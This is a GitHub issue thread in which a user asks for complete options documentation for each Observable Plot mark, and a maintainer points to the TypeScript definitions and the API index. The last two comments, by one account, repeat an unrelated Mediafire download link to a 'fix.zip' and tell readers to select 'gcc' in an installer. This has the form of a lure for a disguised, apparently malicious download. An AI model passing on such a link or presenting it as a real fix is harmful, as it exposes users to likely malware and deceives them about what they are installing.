### ISSUE TITLE
Documentation: complete and consolidated options object definition for each Mark

### ISSUE THREAD

**Issue by todgillespie** [observablehq/feedback#643]
## Is your feature request related to a problem? Please describe.
When I'm building data visualizations using Observable Plot, I spend too much time consulting the Plot documentation. The documentation is not organized for use as a reference, and is missing information I need to map data to channels and optimize the visual results. I find myself jumping all over the place in the docs, sometimes following circular reference loops. I often end up reading through uncommented Plot source code, guessing at answers, and finally determining functionality by trial and error. I want a single source of truth to consult as I'm working with Plot, so that I can focus on visualizing data instead of wrangling the Plot API. The "Cheat Sheets" are a step towards this, but they only cover the most basic use cases.

## Describe the solution you'd like
In the documentation for each Mark, include a **complete** options object definition that shows
* All of the options are for the Mark, including any that are inherited from generic or composite marks
* For each option, list out
  * type(s) of data modeled, e.g. continuous, categorical string, boolean, etc
  * functional effect when supplying each specific data type when many are modeled
  * unit denomination for continuous data, e.g. pixels, percent, etc
  * all available values for each categorial option, along with a description of the effect produced by each
  * default value(s), whether specific to the individual Mark or not
  * ability (or not) to be bound to data. For example, the Vector mark can bind the `length` of the vector's shaft, but not the `r` property controlling the size of the arrow head

## Describe alternatives you've considered
Making this myself :D

**Additional context**
Ideally analogous documentation would also be available for the Plot object itself, as well as Scales, Legends, etc

**Comment by mbostock** [comment]
Plot has [full TypeScript definitions](https://github.com/observablehq/plot/blob/main/src/index.d.ts). In editors that support IntelliSense-style assistance such as VS Code and Zed, as well as Observable notebooks, you should be able to benefit from those types.

**Comment by todgillespie** [comment]
Thank you @mbostock for your quick response, but I'm not finding it helpful. As an Observable customer I use Observable notebooks to work with Plot, so I'm already aware of its inline tooltips & code completion features. I'd also mentioned that I'd like to avoid spending time inspecting Plot source code, which is the Typescript repo you linked in your response. The fact that those two resources exist is part of the problem framing, but they don't form a solution to the problem as I described it. Maybe "not planned" is a better resolution reason for this ticket?

**Comment by mbostock** [comment]
You asked for precise technical documentation of the complete options for every mark; this already exists in the form of fully-commented TypeScript interfaces (`.d.ts`), and furthermore is conveniently surfaced within modern code editors and is fully separate from Plot’s source code implementation (`.js`). What do you want beyond what is already available?

(I will also mention that there is an automatically-generated [API index](https://observablehq.com/plot/api) in the Plot documentation that is likewise generated from these TypeScript definitions.)

If you have further Observable Plot-specific questions or feedback, I would also ask that you move the discussion to the Plot repo either as an issue or a discussion for the benefit of other Plot users. This repo is intended for feedback on the Observable platform, not our open-source projects. Thank you.

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by pilot5657** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."
